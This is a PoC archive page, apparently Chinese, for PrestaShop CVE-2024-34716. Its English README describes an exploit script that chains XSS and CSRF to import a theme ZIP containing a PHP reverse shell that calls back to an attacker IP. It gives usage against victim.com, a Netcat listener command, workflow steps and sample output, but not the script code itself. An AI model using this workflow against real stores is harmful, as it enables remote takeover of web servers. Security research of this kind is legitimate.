POC详情: a8b176686e4c62482da3bf0314e9e99134f1b60d

来源
关联漏洞
标题: PrestaShop 跨站脚本漏洞 (CVE-2024-34716)
描述:PrestaShop是美国PrestaShop公司的一套开源的电子商务解决方案。该方案提供多种支付方式、短消息提醒和商品图片缩放等功能。 PrestaShop 8.1.6之前版本存在跨站脚本漏洞,该漏洞源于容易受到跨站脚本攻击。
介绍
> Seems broken for now will update later

# Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

## Requirements

- **Netcat**: Ensure Netcat is installed and can listen on a specified port (default: 9001).
- **Python 3**: Used to serve files over HTTP.
- **Curl & JQ**: Used to fetch and handle HTTP requests and JSON parsing.

## Usage

```bash
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
```

### Arguments

- `target_url`: Base URL of the target (e.g., `https://example.com`).
- `admin_endpoint`: Path to the admin theme import endpoint.
- `admin_email`: Email address of an administrator (to spoof for the payload).
- `attacker_ip`: IP address where the reverse shell listener will receive the connection.

### Example

```bash
./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
```

### Exploit Workflow

1. **Reverse Shell Creation**: Generates a PHP reverse shell using [revshells.com](https://www.revshells.com) with the provided `attacker_ip` and port `9001`.
2. **ZIP Packaging**: The reverse shell script (`love.php`) is compressed into `Love-exploit.zip`.
3. **CSRF Token Fetch**: Retrieves the CSRF token from the target to authorize the theme import request.
4. **HTML Payload Construction**: Builds an HTML payload (`csrf_payload.html`) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.
5. **HTTP Server Setup**: A temporary HTTP server on port `8000` serves `Love-exploit.zip` for the target to import.
6. **XSS Upload and CSRF Trigger**: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. **Reverse Shell Listener**: The attacker monitors incoming connections from the victim using Netcat.

## Execution Steps

1. Start a Netcat listener on your machine:
   ```bash
   nc -nvlp 9001
   ```

2. Run the script:
   ```bash
   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
   ```

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

## Output

The script outputs the following information during execution:

- CSRF token retrieval status.
- Status of reverse shell creation and packaging.
- Status of payload delivery and HTTP server status.

## Important Notes

- **Permissions**: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
- **Testing Environment**: Use in a controlled, authorized environment only, such as a cybersecurity lab.
- **Port Conflicts**: Ensure ports `8000` (HTTP server) and `9001` (Netcat listener) are free before running the script.

---

### Example Output

```plaintext
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
```

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

--- 

### Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.
文件快照

[4.0K] /data/pocs/a8b176686e4c62482da3bf0314e9e99134f1b60d ├── [5.3K] CVE-2024-34716 └── [3.9K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。